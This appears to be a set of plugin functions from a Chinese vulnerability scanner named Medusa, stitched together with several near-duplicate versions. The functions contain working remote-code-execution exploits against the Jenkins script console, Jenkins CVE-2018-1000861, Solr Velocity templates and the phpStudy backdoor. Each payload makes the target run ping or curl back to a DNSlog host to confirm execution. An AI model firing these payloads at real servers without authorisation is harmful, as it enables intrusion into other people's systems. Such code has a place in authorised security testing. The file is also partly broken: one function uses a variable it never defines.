def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 global resp global resp2 DL = ClassCongregation.Dnslog() # 初始化DNSlog DL.dns_host() post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format( DL.dns_host(), DL.dns_host()) payload = "/script" try: payload_url = url + payload s = requests.session() cookises=re.compile('.*Cookie (.*) for.*').findall(str(s.get(payload_url,timeout=6,proxies=proxies,verify=False).cookies))[0]#正则匹配获取的Cookie字符串 Headers['Content-Type']='application/x-www-form-urlencoded' Headers['Accept']='text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' Headers['Cookis']=cookises resp = s.post(payload_url,headers=Headers, data=post_data,timeout=6,proxies=proxies, verify=False) con = resp.text if DL.result(): Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format(url, payload_url,con,DL.dns_host()) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l=ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: Headers1=Headers Headers1['Content-Type']='application/x-www-form-urlencoded' payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores' step1 =requests.get(payload_url,timeout=6,proxies=proxies, headers = Headers1).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/"+name+"/config" DL = ClassCongregation.Dnslog() payload2 = '/solr/'+name+'/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format(DL.dns_host()) payload_url1 = scheme + "://" + url +":"+ str(port)+ payload payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }""" Headers2 = Headers Headers2['Content-Type']='application/json' resp = requests.post(payload_url1,data=payload_data,headers=Headers2,proxies=proxies, timeout=6, verify=False) resp2 = requests.get(payload_url2, headers=Headers1, timeout=6,proxies=proxies, verify=False) con2 = resp2.text if DL.result() : Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format(url,con2,DL.dns_host()) _t=VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 DL = ClassCongregation.Dnslog() # 初始化DNSlog DL.dns_host() post_data = '''script%3dprintln+%22ping+{}%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+{}%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format( DL.dns_host(), DL.dns_host()) payload = "/script" try: payload_url = scheme + "://" + url + ':' + str(port) + payload s = requests.session() cookises = re.compile('.*Cookie (.*) for.*').findall( str( s.get(payload_url, timeout=6, proxies=proxies, verify=False).cookies))[0] #正则匹配获取的Cookie字符串 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Cookis': cookises } resp = s.post(payload_url, headers=headers, data=post_data, timeout=6, proxies=proxies, verify=False) con = resp.text if DL.result(): Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format( url, payload_url, con, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = ClassCongregation.Dnslog() a = '''public class x { public x(){ "curl %s".execute() } }''' % DL.dns_host() payload2 = urllib.parse.quote(a) # url编码 payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=" payload_url = scheme + "://" + url + ':' + str( port) + payload1 + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text if DL.result(): Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format( url, payload_url, con, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = ClassCongregation.Dnslog() commandS = ('''system("curl http://{}");''').format(DL.dns_host()) cmd = base64.b64encode(commandS.encode('utf-8')) try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '******', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': cmd, 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'User-Agent': RandomAgent } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False) if DL.result(): # if True: Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format( url, payload_url, headers, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: DL = ClassCongregation.Dnslog() a = '''public class x { public x(){ "curl %s".execute() } }''' % DL.dns_host() payload2 = urllib.parse.quote(a) # url编码 payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=" payload_url = url + payload1 + payload2 Headers['Content-Type'] = 'application/x-www-form-urlencoded' Headers[ 'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' resp = requests.post(payload_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text if DL.result(): Medusa = "{} Jenkins远程命令执行漏洞(CVE-2018-1000861)\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\n".format( url, payload_url, con, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url = scheme + "://" + url + ":" + str( port) + '/solr/admin/cores' step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/" + name + "/config" DL = ClassCongregation.Dnslog() payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ping {}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'.format( DL.dns_host()) payload_url1 = scheme + "://" + url + ":" + str(port) + payload payload_url2 = scheme + "://" + url + ":" + str(port) + payload2 payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }""" headers1 = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-Encoding': 'gzip, deflate', } resp = requests.post(payload_url1, data=payload_data, headers=headers1, proxies=proxies, timeout=6, verify=False) resp2 = requests.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False) con2 = resp2.text if DL.result(): Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nDNSlog:{}\r\n".format( url, con2, DL.dns_host()) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, Token).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名